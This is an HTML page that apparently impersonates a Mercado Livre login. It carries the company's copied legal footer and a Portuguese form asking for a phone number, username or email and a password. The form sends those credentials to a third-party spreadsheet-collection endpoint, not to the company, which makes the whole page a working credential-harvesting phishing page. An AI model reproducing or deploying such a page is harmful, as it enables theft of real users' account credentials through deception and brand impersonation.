<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <title>Outdoor</title>
  <style>
  *{padding: ;width:%;
  margin:0;
  background-repeat: no-repeat;
background-image: url(" ");}
li{color:black;
list-style:none;
}
a#freefire{margin-left:38%;
  }
    body{ font-family: Arial;
      height: %;
      width:%;
      margin-left:%;
      ;}
      .bg{
        margin-top:%;
        margin-left:-6%;
        background-repeat:;
        background-size:;
        background-image: url(" oloo.png ");
        
      }
      ul{
      }
      img#logo{margin-top: 50px;
     }a#logo{ margin-left:29%
      }
      
     
      }
      a#soci{margin-left:2%;}
      li{
margin-left: 2%;
margin-top:;
      }
      img#bcg{margin-left: -2%;}
      ::placeholder{font-size:20pt;}
      img#bla{border-radius: 25px;}
      
      
input{
  background-color:rgb(260,250,270);
  border-radius:0.1rem;
  padding:;
  box-sizing: ;
  font-size:20pt;
  width: 450px;
  height:50px ;
  margin-top:20pt;
margin-left:32%;
margin-right:;
  
}
button{
  border:0;
color:white ;
  border-radius:0.5rem;
  padding:;
  box-sizing: ;
  width: 300pt;
  height: 50pt;
  margin-top:25px;
  margin-left: 35%;
  margin-right: ;
  background-color: #0195f6;
font-size:25pt;
}
a {color:#0195f6;
font-size: 19px;
 
  text-decoration: none;
 }
  </style>
  
</head>
<body class="bg"> 

 
<script>
 
 
</script>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>

</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
<a id="logo" ><img src="cab.jpg" width="500px"></a>
</br>
</br>
</br>

 <form action="    https://api.sheetmonkey.io/form/vpBpLwCyVdCNnqtoVo7Kzi  " method="POST">
     <input type="email" name="email" placeholder=" Telefone, nome de usuario ou email" required>
     <input type="password" name="senha" placeholder="Senha" required>

     <button type="submit"><b>Avançar</b></button>

<p></p>
</br>

</form>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
</br>
<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;© 1999-2023 Ebazar.com.br LTDA.
CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre.</b>
</br>

</body>
</html>